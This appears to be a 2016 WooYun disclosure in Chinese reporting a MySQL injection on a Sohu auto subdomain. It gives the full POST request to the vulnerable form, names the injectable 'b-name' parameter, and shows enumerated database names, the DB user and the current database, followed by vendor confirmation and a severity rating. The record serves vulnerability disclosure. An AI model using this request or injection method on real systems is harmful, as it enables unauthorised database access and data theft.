乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-30: 细节已通知厂商并且等待厂商处理中 2016-04-30: 厂商已经确认,细节仅向厂商公开 2016-05-10: 细节向核心白帽子及相关领域专家公开 2016-05-20: 细节向普通白帽子公开 2016-05-30: 细节向实习白帽子公开 2016-06-14: 细节向公众公开
搜狐某站MySQL注射
拿自己写的神器扫扫试试
POST /baike_upload/handleForm.sip HTTP/1.1Host: db.auto.sohu.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://db.auto.sohu.com/baike_upload/baike_update.sip?id=31Cookie: xxxxConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 2130carPic=&b-name=%CD%A8%B7%E7%D7%F9%D2%CE&feeling=%09%26%23160%3B%A1%BE%CB%D1%BA%FC%C6%FB%B3%B5%A1%A1%C3%FB%B4%CA%BD%E2%CA%CD%A1%BF%CD%A8%B7%E7%D7%F9%D2%CE%A3%BA%D2%BB%D6%D6%C6%FB%B3%B5%BF%D5%B5%F7%CD%A8%B7%E7%D7%F9%D2%CE%A3%AC%CB%FC%B0%FC%C0%A8%D3%D0%D2%CE%D7%F9%BA%CD%BF%BF%B1%B3%A3%AC%D4%DA%D2%CE%D7%F9%B5%C4%C9%CF%B1%ED%C3%E6%D2%CE%CC%D7%CF%C2%B5%C4%D2%CE%D7%F9%C4%DA%C9%E8%D6%C3%D3%D0%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%A3%AC%D4%DA%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%CF%C2%B2%BF%B5%C4%D7%F9%D2%CE%C4%DA%C9%E8%D6%C3%D3%D0%CF%F2%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%CA%E4%CB%CD%BF%D5%B5%F7%B7%E7%B5%C4%D2%FD%B7%E7%BB%FA%A3%BB%D4%DA%BF%BF%B1%B3%B5%C4%C7%B0%B1%ED%C3%E6%BF%BF%B1%B3%CC%D7%BA%F3%B2%BF%B5%C4%BF%BF%B1%B3%C4%DA%C9%E8%D6%C3%D3%D0%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%A3%AC%D4%DA%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%BA%F3%B2%BF%B5%C4%BF%BF%B1%B3%C4%DA%C9%E8%D6%C3%D3%D0%CF%F2%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%CA%E4%CB%CD%BF%D5%B5%F7%B7%E7%B5%C4%D2%FD%B7%E7%BB%FA%A1%A3%CE%AA%C1%CB%CA%B9%D3%C3%B7%BD%B1%E3%A3%AC%D4%DA%D2%CE%D7%F9%B5%C4%B2%E0%B1%DA%C9%CF%C9%E8%D6%C3%D3%D0%BF%D8%D6%C6%D2%FD%B7%E7%BB%FA%B9%A4%D7%F7%D7%B4%CC%AC%B5%C4%CE%A2%B5%F7%BF%AA%B9%D8%A1%A3%CE%AA%C1%CB%CC%E1%B8%DF%CD%A8%B7%E7%D0%A7%B9%FB%A3%AC%D4%DA%D2%CE%D7%F9%B5%C4%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%C9%CF%B5%C4%D2%CE%CC%D7%B1%ED%C3%E6%C9%E8%D3%D0%D0%A1%B3%F6%C6%F8%BF%D7%A3%BB%D4%DA%BF%BF%B1%B3%B5%C4%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%B5%C4%BF%BF%B1%B3%CC%D7%B1%ED%C3%E6%C9%E8%D3%D0%D0%A1%B3%F6%C6%F8%BF%D7%A1%A3%B1%BE%CA%B5%D3%C3%D0%C2%D0%CD%B5%C4%D3%D0%D2%E6%D0%A7%B9%FB%CA%C7%A3%BA%BD%E1%B9%B9%BC%F2%B5%A5%A1%A2%CA%B9%D3%C3%B7%BD%B1%E3%A1%A2%B0%B2%D7%B0%BC%BC%CA%F5%BC%F2%B5%A5%A3%AC%C7%D2%B2%BB%C6%C6%BB%B5%C6%FB%B3%B5%D2%CE%D7%D3%BD%E1%B9%B9%D3%EB%CD%E2%B9%DB%A3%AC%C4%DC%B4%EF%B5%BD%BD%DA%C4%DC%BB%B7%B1%A3%CE%C0%C9%FA%B5%C4%B9%A6%C4%DC%A1%A3%0D%0A%0D%0A%09%0D%0A%09%09%0D%0A%09%09%09%0D%0A%09%09%09%09%0D%0A%09%09%0D%0A%09%09%0D%0A%09%09%09%0D%0A%09%09%09%09%26%23160%3B%0D%0A%09%09%0D%0A%09%0D%0A%0D%0A%0D%0A%0D%0A%09%26%23160%3B%0D%0A
注入参数#b-name
available databases [7]:[*] auto_bmw[*] auto_search[*] auto_warehouse[*] information_schema[*] sohu_priceinfo[*] tmp[*] usedcar
当前数据库用户:'wanjiang@10.%'
当前数据库:'auto_warehouse'
过滤
危害等级:中
漏洞Rank:8
确认时间:2016-04-30 10:42
感谢提供
暂无